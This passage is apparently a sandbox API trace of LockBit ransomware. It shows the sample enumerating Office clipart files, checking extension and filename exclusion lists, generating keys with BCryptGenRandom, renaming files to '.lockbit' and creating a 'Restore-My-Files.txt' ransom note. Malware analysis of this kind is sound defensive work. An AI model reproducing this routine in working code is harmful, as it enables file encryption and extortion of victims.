(lpString1=".shs", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.364] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.364] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00255_.WMF") returned -1 [0179.365] lstrcmpiW (lpString1="ntldr", lpString2="TN00255_.WMF") returned -1 [0179.365] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00255_.WMF") returned -1 [0179.365] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00255_.WMF") returned -1 [0179.365] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00255_.WMF") returned -1 [0179.365] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00255_.WMF") returned -1 [0179.365] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00255_.WMF") returned -1 [0179.365] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.365] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00255_.WMF") returned=".WMF" [0179.365] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.365] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.365] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.366] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.366] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00255_.WMF.lockbit") returned 72 [0179.366] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00255_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0179.368] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.368] malloc (_Size=0x40068) returned 0x3f70048 [0179.368] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=7592) returned 1 [0179.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0179.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0179.369] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0179.376] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00255_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00255_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.376] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.376] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.378] free (_Block=0x1fa2ed8) [0179.378] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00255_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.378] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.378] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84184a00, ftCreationTime.dwHighDateTime=0x1bd4af1, ftLastAccessTime.dwLowDateTime=0x6d4fb570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x84184a00, ftLastWriteTime.dwHighDateTime=0x1bd4af1, nFileSizeHigh=0x0, nFileSizeLow=0x7dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00330_.WMF", cAlternateFileName="")) returned 1 [0179.379] lstrcmpiW (lpString1=".", lpString2="TN00330_.WMF") returned -1 [0179.379] lstrcmpiW (lpString1="..", lpString2="TN00330_.WMF") returned -1 [0179.379] PathFindExtensionW (pszPath="TN00330_.WMF") returned=".WMF" [0179.379] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.379] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.380] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.380] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00330_.WMF") returned -1 [0179.381] lstrcmpiW (lpString1="ntldr", lpString2="TN00330_.WMF") returned -1 [0179.381] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00330_.WMF") returned -1 [0179.381] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00330_.WMF") returned -1 [0179.381] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00330_.WMF") returned -1 [0179.381] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00330_.WMF") returned -1 [0179.381] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00330_.WMF") returned -1 [0179.381] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.381] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00330_.WMF") returned=".WMF" [0179.381] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.381] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.381] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.382] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.382] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00330_.WMF.lockbit") returned 72 [0179.382] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00330_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00330_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0179.444] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.444] malloc (_Size=0x40068) returned 0x3df0008 [0179.444] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2012) returned 1 [0179.444] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.445] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0179.445] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.445] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0179.446] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0179.448] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00330_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00330_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0179.448] malloc (_Size=0xa6) returned 0x1fa2ed8 [0179.448] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0179.449] free (_Block=0x1fa2ed8) [0179.449] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00330_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0179.449] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0179.449] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0179.449] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c77a00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d4fb570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x79c77a00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xf72, dwReserved0=0x0, dwReserved1=0x0, cFileName="TN00411_.WMF", cAlternateFileName="")) returned 1 [0179.449] lstrcmpiW (lpString1=".", lpString2="TN00411_.WMF") returned -1 [0179.449] lstrcmpiW (lpString1="..", lpString2="TN00411_.WMF") returned -1 [0179.449] PathFindExtensionW (pszPath="TN00411_.WMF") returned=".WMF" [0179.449] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0179.449] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0179.449] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0179.449] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0179.449] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0179.449] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0179.449] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0179.449] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0179.449] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0179.449] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0179.449] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0179.449] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0179.450] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0179.450] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="TN00411_.WMF") returned -1 [0179.451] lstrcmpiW (lpString1="ntldr", lpString2="TN00411_.WMF") returned -1 [0179.451] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="TN00411_.WMF") returned -1 [0179.451] lstrcmpiW (lpString1="bootsect.bak", lpString2="TN00411_.WMF") returned -1 [0179.451] lstrcmpiW (lpString1="autorun.inf", lpString2="TN00411_.WMF") returned -1 [0179.451] lstrcmpiW (lpString1="thumbs.db", lpString2="TN00411_.WMF") returned -1 [0179.451] lstrcmpiW (lpString1="iconcache.db", lpString2="TN00411_.WMF") returned -1 [0179.451] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0179.451] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00411_.WMF") returned=".WMF" [0179.451] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0179.451] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0179.451] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0179.452] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0179.452] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00411_.WMF.lockbit") returned 72 [0179.452] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00411_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00411_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0179.453] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0179.453] malloc (_Size=0x40068) returned 0x1ff1e60 [0179.453] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3954) returned 1 [0179.453] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.454] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0179.454] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.454] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.454] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0179.455] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0179.456] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft 